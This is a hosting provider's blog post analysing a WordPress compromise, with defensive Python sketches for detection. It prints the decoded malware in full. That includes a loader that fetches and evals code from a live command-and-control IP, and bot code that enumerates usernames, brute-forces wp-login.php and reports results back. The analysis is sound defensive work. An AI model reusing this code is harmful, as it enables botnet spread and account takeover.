Anatomy of a WordPress Hack

26 June 2015 / by Marek / Security, Systems Administration, Linux, Malware, Distributed Denial of Service Attack + Tech Deep Dives.

Originally a blogging platform, WordPress has grown in popularity to the point of becoming a huge ecosystem of plugins and themes built by thousands of developers across the world. WordPress, at the core, is a very simple piece of software. It is, arguably, one of the best blogging platforms. It was never designed to be a full content management system able to run an online web shop, host user-editable calendars, purge content as it changes from caching HTTP accelerators… it was made to show a few user-editable pages and host a blog. Being so small and self-contained at the core, WordPress’ simplicity is intrinsic to its popularity. So while WordPress doesn’t do very much “out of the box” it is easy to add things to it. The shallow learning curve, coupled with the large developer community, makes it a great place to learn about web technologies and content management systems. This has created a tension: security.

If you find WordPress lacking, you either develop a module yourself or download somebody else’s. The problem is that you are now reliant upon other people’s code to not be buggy, insecure, or inefficient. This can conflict with the attraction of WordPress to novice developers. If its author lacked the experience of (or even just guidance from) battle-hardened developers, the plugin you have installed might be riddled with as yet undiscovered problems. If the developer of the plugin is slow at pushing out a security fix, you will be slow installing the updates (though in our experience, only about half of WordPress blogs seem to get updated by their users).

Even if you do update your active plugins, it is possible that a plugin that was installed and subsequently deactivated (but not removed entirely) can pose a security threat. Its files still reside on disk, and — depending on the configuration of the server and the code in question — can still be made to run by visiting a specific URL.

This happened to a customer of ours: a plugin that they had deactivated long ago still had vulnerable PHP files on disk. It didn’t get updated (“it’s not active!”). And eventually, a bot swept through a list of URLs to test, found a vulnerable piece of code, and gained entry.

Every single PHP file in the attacked WordPress site had a backdoor injected into it. Every single PHP file that the site could access was modified in this way, so backup versions of the code were also modified. Were we to run all requests on our shared web servers as the same user, and were that user to have write permission to all websites (because that seems to be the preferred way for WordPress to update itself), every single site we host on those servers would have been compromised. For this reason, we run with suPHP: each customer’s PHP scripts are executed by their own user and group. They cannot change anything belonging to other customers.

The backdoor injection was a smart move by the attackers, because it makes post-infection clean-up harder. Hundreds of PHP files would have needed checking by hand (automated scripts were too coarse to remove everything without damaging some of the PHP files). We advised the customer to reinstall all the code from scratch.

Faelix scanned the database for any potential code injections there — this is one of the preferred ways of backdooring a Drupal website. We could not spot any backdoor code in the site, thankfully. So we then went through all the other files on the site, finding several additional PHP files in the WordPress uploads directory, in the root of the site, and alongside modules (with filenames that wouldn’t be overwritten by a newer version of the module).
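
The file sweep described above can be approximated with a short script. This is only a minimal sketch, not the tooling we actually used: the function name, the list of extensions, and the example path are all assumptions for illustration. It simply lists PHP-like files under a directory (such as an uploads folder) where executable code would not normally be expected.

```python
import os


def find_php_files(root):
    """Return sorted paths of files under root that have a PHP-like extension."""
    # Assumed list of extensions; a real server may map others to PHP too.
    suspicious_ext = (".php", ".phtml", ".php5")
    hits = []
    for dirpath, _dirnames, filenames in os.walk(root):
        for name in filenames:
            if name.lower().endswith(suspicious_ext):
                hits.append(os.path.join(dirpath, name))
    return sorted(hits)


if __name__ == "__main__":
    # Hypothetical path; adjust to the site being inspected.
    for path in find_php_files("wp-content/uploads"):
        print(path)
```

A listing like this only narrows down where to look. It cannot tell a legitimate file from a planted one, which is why reinstalling from known-good code remained our advice.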

So what did the hacked site end up doing?

One of the most common things hacked WordPress sites do is spread the infection. This was no exception. We saw five processes running:

hackedcustomer    4409  0.0  0.6 182736 28156 ?        S    14:37   0:03 php -q /tmp/tmp
hackedcustomer    4762  0.0  0.6 185600 26844 ?        S    15:03   0:01 php -q /tmp/tmp
hackedcustomer    5474  0.0  0.6 181564 26980 ?        S    15:29   0:01 php -q /tmp/tmp
hackedcustomer    6164  0.0  0.6 181304 25080 ?        S    15:55   0:00 php -q /tmp/tmp
hackedcustomer    7251  0.0  0.2 164048 10288 ?        S    16:20   0:00 php -q /tmp/tmp

A quick scan of the contents of /proc turned up the dates and times at which these processes had come into existence. We cross-correlated those with the Apache server logs to find where the initial “command” had come from, and redirected traffic from that IP address to our honeypot/forensics server, called “shitpit”. Meanwhile we ran strace on one of the processes. Sure enough, it was making outbound web requests:

connect(3, {sa_family=AF_INET, sin_port=htons(80), sin_addr=inet_addr("54.154.XXX.XXX")}, 16) = -1 EINPROGRESS (Operation now in progress)
clock_gettime(CLOCK_MONOTONIC, {5335844, 178514618}) = 0
clock_gettime(CLOCK_MONOTONIC, {5335844, 178682561}) = 0
poll([{fd=3, events=POLLOUT|POLLWRNORM}], 1, 1000) = 1 ([{fd=3, revents=POLLOUT|POLLWRNORM}])
clock_gettime(CLOCK_MONOTONIC, {5335844, 191107212}) = 0
getsockopt(3, SOL_SOCKET, SO_ERROR, [0], [4]) = 0
getpeername(3, {sa_family=AF_INET, sin_port=htons(80), sin_addr=inet_addr("54.154.XXX.XXX")}, [16]) = 0
getsockname(3, {sa_family=AF_INET, sin_port=htons(43289), sin_addr=inet_addr("46.227.20X.XXX")}, [16]) = 0

clock_gettime(CLOCK_MONOTONIC, {5335884, 878398690}) = 0
clock_gettime(CLOCK_MONOTONIC, {5335884, 878567133}) = 0
poll([{fd=3, events=POLLOUT|POLLWRNORM}], 1, 1000) = 1 ([{fd=3, revents=POLLOUT|POLLWRNORM}])
clock_gettime(CLOCK_MONOTONIC, {5335884, 955507807}) = 0
getsockopt(3, SOL_SOCKET, SO_ERROR, [0], [4]) = 0
getpeername(3, {sa_family=AF_INET, sin_port=htons(80), sin_addr=inet_addr("192.34.XXX.XXX")}, [16]) = 0
getsockname(3, {sa_family=AF_INET, sin_port=htons(34508), sin_addr=inet_addr("46.227.20X.XXX")}, [16]) = 0
clock_gettime(CLOCK_MONOTONIC, {5335884, 956420309}) = 0
clock_gettime(CLOCK_MONOTONIC, {5335884, 956591499}) = 0
clock_gettime(CLOCK_MONOTONIC, {5335884, 956760432}) = 0
clock_gettime(CLOCK_MONOTONIC, {5335884, 956927738}) = 0
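
The cross-correlation of process start times against the Apache logs, mentioned before the strace output, might look roughly like the sketch below. It assumes the common/combined access log layout and a timezone-aware process start time. The function name and the five-second window are illustrative choices, not what we ran on the day.

```python
import re
from datetime import datetime, timedelta

# Matches the start of a common/combined format line: client, timestamp, method, path.
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+)')


def requests_near(log_lines, started_at, window_seconds=5):
    """Return (client_ip, method, path) for POSTs logged shortly before started_at."""
    window = timedelta(seconds=window_seconds)
    hits = []
    for line in log_lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # skip lines that do not look like access log entries
        ip, stamp, method, path = m.groups()
        when = datetime.strptime(stamp, "%d/%b/%Y:%H:%M:%S %z")
        # Keep POSTs that happened at most `window` before the process started.
        if method == "POST" and timedelta(0) <= started_at - when <= window:
            hits.append((ip, method, path))
    return hits
```

Only POST requests are considered here because the command arrived as a POST; widening the window or including GETs trades precision for recall.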

Between the five processes, they were churning through connections at quite a rate:

tcp        0      0 46.227.20X.XXX:35996    173.254.XXX.XXX:80      ESTABLISHED 6164/php
tcp        0      0 46.227.20X.XXX:35474    101.79.XXX.XXX:80       TIME_WAIT   -
tcp        0    379 46.227.20X.XXX:38194    184.168.XXX.XXX:80      ESTABLISHED 4409/php
tcp        0      0 46.227.20X.XXX:58522    192.185.XXX.XXX:80      ESTABLISHED 5474/php
tcp        0      0 46.227.20X.XXX:52072    157.7.XXX.XXX:80        ESTABLISHED 4762/php

tcp        0      0 46.227.20X.XXX:35474    101.79.XXX.XXX:80       TIME_WAIT   -
tcp        0    180 46.227.20X.XXX:58543    192.185.XXX.XXX:80      ESTABLISHED 5474/php
tcp        0      0 46.227.20X.XXX:36595    178.79.XXX.XXX:80       ESTABLISHED 4409/php
tcp        0      0 46.227.20X.XXX:36009    173.254.XXX.XXX:80      ESTABLISHED 6164/php
tcp        0      0 46.227.20X.XXX:52095    157.7.XXX.XXX:80        ESTABLISHED 4762/php

tcp        0      0 46.227.20X.XXX:58559    192.185.XXX.XXX:80      ESTABLISHED 5474/php
tcp        0      0 46.227.20X.XXX:35474    101.79.XXX.XXX:80       TIME_WAIT   -
tcp        0      0 46.227.20X.XXX:36614    178.79.XXX.XXX:80       ESTABLISHED 4409/php
tcp        0      1 46.227.20X.XXX:36043    173.254.XXX.XXX:80      SYN_SENT    6164/php

tcp        0      0 46.227.20X.XXX:36625    178.79.XXX.XXX:80       ESTABLISHED 4409/php
tcp        0      0 46.227.20X.XXX:58559    192.185.XXX.XXX:80      ESTABLISHED 5474/php
tcp        0      0 46.227.20X.XXX:35474    101.79.XXX.XXX:80       TIME_WAIT   -
tcp        0      0 46.227.20X.XXX:52104    157.7.XXX.XXX:80        ESTABLISHED 4762/php

tcp        0      0 46.227.20X.XXX:52114    157.7.XXX.XXX:80        ESTABLISHED 4762/php
tcp        0      0 46.227.20X.XXX:58559    192.185.XXX.XXX:80      ESTABLISHED 5474/php
tcp        0      0 46.227.20X.XXX:35474    101.79.XXX.XXX:80       TIME_WAIT   -
tcp        0    371 46.227.20X.XXX:36051    173.254.XXX.XXX:80      ESTABLISHED 6164/php

Soon our forensics box saw the command and control attempt: a pair of variables in an HTTP POST to a specific URL:

Array
(
    cookie => 1
    a88027eb01 => JGtvZC...SNIP...l0OyAg
)

The large base-64 encoded payload decoded to:

function get22($url)
{
    $ch = curl_init();
    curl_setopt($ch, CURLOPT_URL, $url);
    curl_setopt($ch, CURLOPT_HEADER, 0);
    curl_setopt($ch, CURLINFO_HEADER_OUT, 0);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
    curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)");
    curl_setopt($ch, CURLOPT_ENCODING, "utf-8");
    curl_setopt($ch, CURLOPT_TIMEOUT, 30);
    curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
    curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
    curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
    $data = curl_exec($ch);
    curl_close($ch);
    return $data;
}
@eval(@get22("http://31.184.192.234/ww22/codes.php"))  ;

@file_put_contents('/tmp/tmp',$kod);
if (strstr(file_get_contents('/tmp/tmp'),'@eval')) {
    @system('php -q /tmp/tmp < /dev/null > /tmp/php5.tmp &');
}
sleep(10);
unlink('/tmp/tmp'); echo 'g00d1'; exit;
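
A honeypot can decode parameters like the one above for inspection without ever executing them. The following is a minimal sketch of that idea. The function names and the 16-character minimum length are assumptions, and any payload fed to it in testing should be a harmless stand-in rather than the attacker's code.

```python
import base64
import binascii


def decode_if_base64(value):
    """Return the decoded text if value is valid base64, else None. Nothing is executed."""
    try:
        raw = base64.b64decode(value, validate=True)
    except (binascii.Error, ValueError):
        return None
    return raw.decode("utf-8", errors="replace")


def inspect_post(fields, min_length=16):
    """Map POST field names to decoded text for fields that look like base64 payloads."""
    decoded = {}
    for name, value in fields.items():
        # Short values such as "1" are ignored: many short strings are valid base64.
        if len(value) < min_length:
            continue
        text = decode_if_base64(value)
        if text is not None:
            decoded[name] = text
    return decoded
```

The decoded text should be treated purely as data: written to a log or a file for analysis, never passed to an interpreter.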

The fetched codes.php contained the real payload: the long-running “bot” process which would fetch further instructions from the same server, 31.184.192.234 — hosted at a Russian ISP. Now to analyse roughly what it does.

First, it becomes a long-running process, tries to cover its tracks (especially in combination with the unlink above), and sheds as many limits as possible:

@set_time_limit(0);
@error_reporting(0);
@ignore_user_abort(1);

sleep(1000);

Here are some logins to try:

$logins = array('admin','administrator','webmaster','wpadmin','wp_admin','editor','root');

The get function is used to:

fetch the list of sites to try hacking
fetch the sites’ Atom feeds
fetch pages looking for authors (usernames) on the target sites

It masquerades as Googlebot:

function get($url)
{
    $ch = curl_init();
    curl_setopt($ch, CURLOPT_URL, $url);
    curl_setopt($ch, CURLOPT_HEADER, 1);
    curl_setopt($ch, CURLINFO_HEADER_OUT, 1);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
    curl_setopt($ch, CURLOPT_USERAGENT, 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)');
    curl_setopt($ch, CURLOPT_ENCODING, 'utf-8');
    curl_setopt($ch, CURLOPT_TIMEOUT, 30);
    curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
    curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
    curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
    $data = curl_exec($ch);
    curl_close($ch);
    return $data;
}

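The check function tries to log in to the target website. This function hints at a few pieces of low-hanging fruit for blocking automated WordPress logins (which we have implemented on our shared servers). It appears that this script has a hard-coded password, but the purpose of this script does not appear to be to gain access: it is a distributed scanner, identifying WordPress sites and account names as potential targets. The final strstr test seems to rely on WordPress re-populating the username field of the login form only when the account exists and the password is wrong, so a match would confirm a valid username.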

function check($url,$login) {
$login = strtolower($login);
$postData = 'log='.$login.'&pwd=hoho17&wp-submit=Log+In&redirect_to='.$url.'wp-admin/&testcookie=1';
$url = $url.'wp-login.php';
    $ch = curl_init();
    curl_setopt($ch,CURLOPT_URL,$url);
    curl_setopt($ch,CURLOPT_RETURNTRANSFER,true);
    curl_setopt($ch,CURLOPT_HEADER, false);
    curl_setopt($ch, CURLOPT_POST, true);
    curl_setopt($ch, CURLOPT_TIMEOUT, 30);
    curl_setopt($ch, CURLOPT_USERAGENT, 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)');
    curl_setopt($ch, CURLOPT_COOKIE, "wordpress_test_cookie=WP+Cookie+check");
    curl_setopt($ch, CURLOPT_POSTFIELDS, $postData);
    $output=curl_exec($ch);
    curl_close($ch);
if (strstr($output,'value="'.$login.'"')) { return true; } else { return false; }
}
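
The original text does not spell out which low-hanging fruit we block on, so the sketch below is only one plausible reading of the check function above: a genuine search crawler has no reason to POST to wp-login.php, and the script sends no Referer header, which a browser submitting the login form normally would. The function name and the wording of the flags are hypothetical.

```python
def login_post_red_flags(method, path, headers):
    """Return a list of reasons a request resembles the scripted login attempts."""
    flags = []
    # Only POSTs to the WordPress login script are of interest here.
    if method != "POST" or not path.split("?")[0].endswith("wp-login.php"):
        return flags
    lowered = {key.lower(): value for key, value in headers.items()}
    if "googlebot" in lowered.get("user-agent", "").lower():
        flags.append("crawler user agent on a login POST")
    if not lowered.get("referer"):
        flags.append("no Referer header")
    return flags
```

Either flag alone is weak evidence, and a missing Referer in particular can occur with privacy-minded browsers, so a rule like this is better suited to scoring or rate limiting than to outright blocking.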

The send function seems to be used for reporting back any user account names uncovered during the site scan:

function send($kod,$array) {
$postData = 'kod='.$kod.'&array='.$array;
    $ch = curl_init();
    curl_setopt($ch,CURLOPT_URL,'http://31.184.192.234/ww22/day.php');
    curl_setopt($ch,CURLOPT_RETURNTRANSFER,true);
    curl_setopt($ch,CURLOPT_HEADER, false);
    curl_setopt($ch, CURLOPT_POST, true);
    curl_setopt($ch, CURLOPT_TIMEOUT, 30);
    curl_setopt($ch, CURLOPT_USERAGENT, 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)');
    curl_setopt($ch, CURLOPT_POSTFIELDS, $postData);
    $output=curl_exec($ch);
    curl_close($ch);
}

The misspelled (or Spanish-named?) get_autor function and the get_atom function are used to find user account names on the target site:

function get_autor($url) {
$user = array();

for ($z=1 ; $z<=3; $z++) {
$otv = @get($url.'?author='.$z);
$pattern = '/class="archive author author-([a-z0-9 _.\-@]{2,30}) /iU';
preg_match($pattern, $otv, $matches);
if (isset($matches[1])) $user[] = $matches[1];
$pattern2 = '/Posts by ([a-z0-9 _.\-@]{2,30}) Feed/iU';
preg_match($pattern2, $otv, $matches2);
if (isset($matches2[1])) $user[] = $matches2[1];
}
return $user;
}

function get_atom($url) {
$user = array();
$otv = @get($url.'?feed=atom');
$pattern = '/<name>([a-z0-9 _.\-@]{2,30})<\/name>/i';
preg_match_all($pattern, $otv, $matches);
if (isset($matches[1])) {
for ($z=0 ; $z<=sizeof($matches[1])-1; $z++) {
$user[] = $matches[1][$z];
}
}
return $user;
}
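
Because get_autor walks ?author=1 to ?author=3 from the same bot, the probing leaves a recognisable pattern in the target's access log. A rough detection sketch follows, assuming the log has already been reduced to (client IP, URL) pairs. The function name and the threshold of three distinct ids are illustrative choices.

```python
from collections import defaultdict
from urllib.parse import parse_qs, urlsplit


def author_probes(requests, threshold=3):
    """Return {client_ip: sorted author ids} for clients probing many ?author=N values."""
    seen = defaultdict(set)
    for ip, url in requests:
        query = parse_qs(urlsplit(url).query)
        for value in query.get("author", []):
            if value.isdigit():
                seen[ip].add(int(value))
    # Report only clients that asked for at least `threshold` distinct author ids.
    return {ip: sorted(ids) for ip, ids in seen.items() if len(ids) >= threshold}
```

A visitor clicking through author archives could trip this too, so the result is a list of candidates to examine rather than proof of a scan.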

The test1 function seems to determine whether a target site is running WordPress and permits logins, and decides which usernames to attack:

function test1($url) {
global $logins;
$arr = array();
$autor = array();
$tmp = get($url.'wp-login.php');
if (strstr($tmp,'"log"') and strstr($tmp,'"pwd"')) {
$autor = get_autor($url);
$atom = get_atom($url);
$mass = array_values(array_unique(array_merge(array_merge($autor,$atom),$logins)));
$mass = array_map('strtolower', $mass);
for ($z=0 ; $z<=sizeof($mass)-1; $z++) {
if (check($url,$mass[$z])) $arr[]=$mass[$z];
}
}
if (isset($arr[0])) { return implode(';',$arr); } else return 'nonon';
}

The go function compiles the list of site and username combinations (if the script has found any usernames to attack). The developer of this script does not seem to understand what null is for, opting for a hard-coded value “nonon” instead.

function go($array) {
$hosts = $array;
$otv=array();
for ($i=0 ; $i<=sizeof($hosts)-1; $i++) {

$host = $hosts[$i];
$string = str_replace("\r", '',$host);
$host = str_replace("\n", '',$string);
$user = @test1($host);
if ($user != 'nonon') $otv[] = $host.'  '.$user;
}
return $otv;
}

Finally it executes: fetch the targets, attack them, send in results, and repeat from the beginning.

while (true)
{
$get =  get('http://31.184.192.234/ww22/');
if (strstr($get,'!-START-!')) {
$temp = explode('!-START-!',$get);
$arr = explode("\n",str_replace("\r", '',$temp[1]));
$kod = $arr[0];
array_splice($arr,0,1);
if (sizeof($arr)>100) {
$tmp = go($arr);
if (isset($tmp[0])) {
$otv = implode("\r\n",$tmp);
send($kod,$otv);
} else exit;
} else exit;
} else exit;
}

All in all, this reconnaissance script is pretty effective:

it is easy to command and control
it tries to determine some account names before attacking
the attack is distributed in such a manner that it does not trigger e.g. fail2ban scanning logfiles for repeated login failures from one address
quite likely the owners of the bot-net will have chosen common passwords to try (but maybe they’re not so smart as to filter them by the target blog’s language)
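
Since the attack is spread over many source addresses, counting failures per address (as a typical fail2ban setup does) misses it. One way to think about a countermeasure is to count per target instead. The sketch below assumes failed logins are available as (site, username, client IP) tuples; that input format, the function name, and the threshold are all assumptions rather than a description of any existing tool.

```python
from collections import defaultdict


def distributed_failures(events, min_ips=3):
    """Return {(site, username): ip_count} for accounts failing from many distinct IPs."""
    ips = defaultdict(set)
    for site, user, ip in events:
        # Usernames are lower-cased because the scanner lower-cases them too.
        ips[(site, user.lower())].add(ip)
    return {key: len(addrs) for key, addrs in ips.items() if len(addrs) >= min_ips}
```

An account that fails from several unrelated addresses in a short period is a far stronger signal than any single address failing a handful of times.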

A few days later, another attack attempt tried to send us the following long-running script:

@set_time_limit(0);
@error_reporting(0);
@ignore_user_abort(1);

sleep(333);

The send and get functions seem pretty similar:

function send($kod,$array) {
$postData = 'kod='.$kod.'&array='.$array;
    $ch = curl_init();
    curl_setopt($ch,CURLOPT_URL,'http://31.184.192.234/wbr/day.php');
    curl_setopt($ch,CURLOPT_RETURNTRANSFER,true);
    curl_setopt($ch,CURLOPT_HEADER, false);
    curl_setopt($ch, CURLOPT_POST, true);
    curl_setopt($ch, CURLOPT_TIMEOUT, 30);
    curl_setopt($ch, CURLOPT_USERAGENT, 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)');
    curl_setopt($ch, CURLOPT_POSTFIELDS, $postData);
    $output=curl_exec($ch);
    curl_close($ch);
}

function get($url)
{
    $ch = curl_init();
    curl_setopt($ch, CURLOPT_URL, $url);
    curl_setopt($ch, CURLOPT_HEADER, 0);
    curl_setopt($ch, CURLINFO_HEADER_OUT, 0);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
    curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)");
    curl_setopt($ch, CURLOPT_ENCODING, "utf-8");
    curl_setopt($ch, CURLOPT_TIMEOUT, 30);
    curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
    curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
    curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
    $data = curl_exec($ch);
    curl_close($ch);
    return $data;
}

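But what go does is completely different! For starters, the code is indented. It also uses curl’s multi interface to keep around 50 requests in flight at once (the code calls them “threads”, although curl_multi runs the transfers concurrently within a single process rather than in real threads). Why no concurrency in the “scout” script? Are they under pressure to deliver more results, faster?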

There is a strange mix of camelCase and under_score variable names. This suggests an uncoordinated development team, or maybe copy/paste from StackOverflow or other code?

Strangely, rather than testing for a “302” HTTP redirect (WordPress signals “success” as a redirect and “failure” as an HTTP 200 OK), the developers of this malware are checking whether they have been redirected to a URL they supply in the login attempt: wp-admin/tes1a0 (which could be an interesting signature for spotting this attack in targets’ logfiles).

Also, the same low-hanging fruit apply in this code.

function go($aid) {
$otv = array();
$links = file('http://31.184.192.234/wbr/bbd/'.$aid, FILE_IGNORE_NEW_LINES | FILE_SKIP_EMPTY_LINES);
if (sizeof($links)<3000) exit;
$maxThreads = 50;
$multicurlInit = curl_multi_init();
do
{
    while(@$active <= $maxThreads)
    {
        @$active++;
        if(count($links) == 0)
            break;
        $idLink = array_rand($links);
        $link = $links[$idLink];
        $temp_arr = explode('   ',$link);
        $url = $temp_arr[0];
        $login = $temp_arr[1];
        $pass = $temp_arr[2];
        $postData = 'log='.urlencode($login).'&pwd='.urlencode($pass).'&wp-submit=Log+In&redirect_to='.$url.'wp-admin/tes1a0&testcookie=1';
        unset($links[$idLink]);
        $newThread = curl_init();
        curl_setopt_array($newThread, array(
                CURLOPT_URL            => $url.'wp-login.php',
                CURLOPT_RETURNTRANSFER => true,
                CURLOPT_HEADER => true,
                CURLOPT_POST => true,
                CURLOPT_CONNECTTIMEOUT => 10,
                CURLOPT_TIMEOUT        => 30,
                CURLOPT_USERAGENT      => 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)',
                CURLOPT_COOKIE      => "wordpress_test_cookie=WP+Cookie+check",
                CURLOPT_POSTFIELDS      => $postData,
                CURLOPT_PRIVATE      => $url.'  '.$login.'  '.$pass,
                CURLOPT_FAILONERROR    => false,
            )
        );
        curl_multi_add_handle($multicurlInit, $newThread);
        unset($newThread);
    }
    $curlMultiResult = curl_multi_exec($multicurlInit, $active);
    do
    {
        $result = curl_multi_info_read($multicurlInit);
        if( ! is_array($result))
            break;
        $id = curl_getinfo($result['handle'], CURLINFO_PRIVATE);
        $ttemp =  curl_multi_getcontent($result['handle']);
        if (preg_match("/Location:(.*?)tes1a0/", $ttemp)) $otv[] = $id;
        curl_multi_remove_handle($multicurlInit, $result['handle']);
        curl_close($result['handle']);
    } while(true);
    if(count($links) == 0 && $active == 0)
        break;
} while(true);
return $otv;
}
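
The tes1a0 marker that go puts into redirect_to travels in the POST body, which a standard access log does not record, so spotting it requires some form of request body logging. Assuming the raw form-encoded body is available, a check could be sketched as follows. The function name is hypothetical and the marker is the one from the listing above.

```python
from urllib.parse import parse_qs


def has_redirect_marker(post_body, marker="tes1a0"):
    """True if a form-encoded login body asks to be redirected to a URL ending in marker."""
    fields = parse_qs(post_body)
    return any(
        value.rstrip("/").endswith(marker)
        for value in fields.get("redirect_to", [])
    )
```

The marker is trivial for the attackers to change, so a match is useful for attributing traffic to this particular script but should not be relied upon as a lasting defence.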

This malware’s C&C implements a system to send the malware a batch of targets, which it then fetches. The developer behind this section isn’t too smart: rather than writing all this code to parse with regexps and explode, they could have just used two lines of PHP to parse a JSON response. Maybe there’s a small team of developers behind this malware: someone putting together the interface to the database of targets, someone who wrote the original exploit, and a slightly more experienced coder who added threads?

$err = 0;
while (true)
{
$idtemp = @get('http://31.184.192.234/wbr/');
if ($idtemp=='ext') exit;
if (preg_match("/ISD(.*?)ISD/", $idtemp)) {
$idtemp2 = explode('ISD',$idtemp);
$id = $idtemp2[1];
$arr = go($id);
if (isset($arr[0])) {
send($id,implode('|',$arr));
}
@get('http://31.184.192.234/wbr/de1s.php?d='.$id.'|'.sizeof($arr));
$err = 0;
} else { $err = $err+1; sleep(300); }
if ($err>12) exit;
}
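
To illustrate the point about parsing, here is a sketch comparing the delimiter approach in the loop above with a JSON alternative. It is written in Python rather than PHP, and the JSON shape (an object with an "id" key) is purely hypothetical, since the real C&C never sent JSON.

```python
import json
import re


def parse_isd(response):
    """Extract the batch id from an 'ISD<id>ISD' response, as the malware's loop does."""
    match = re.search(r"ISD(.*?)ISD", response)
    return match.group(1) if match else None


def parse_json(response):
    """Read the batch id from a JSON object instead (hypothetical response format)."""
    try:
        return json.loads(response).get("id")
    except (ValueError, AttributeError):
        # Not JSON at all, or JSON that is not an object.
        return None
```

With a structured format the “ext” sentinel and the error counter could also have been carried as ordinary fields instead of special-cased strings.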

Faelix scanned through a couple of web servers’ logfiles to look for attacks that matched these signatures, and compared them with some of the target files served by this malware’s C&C server. It’s quite probable that this Russian C&C server’s operators aren’t the only people doing this kind of attack: we found numerous websites we host were being targeted, but none appeared on this group’s lists.

Did several hackers think of the same techniques, all stumbling upon the same “best practices” to maximise the efficiency of their payloads? Have they been sharing “good ideas” on some forum, and implemented group-think signatures? Or is there no honour among thieves, and code stealing is rife within this underground “industry”?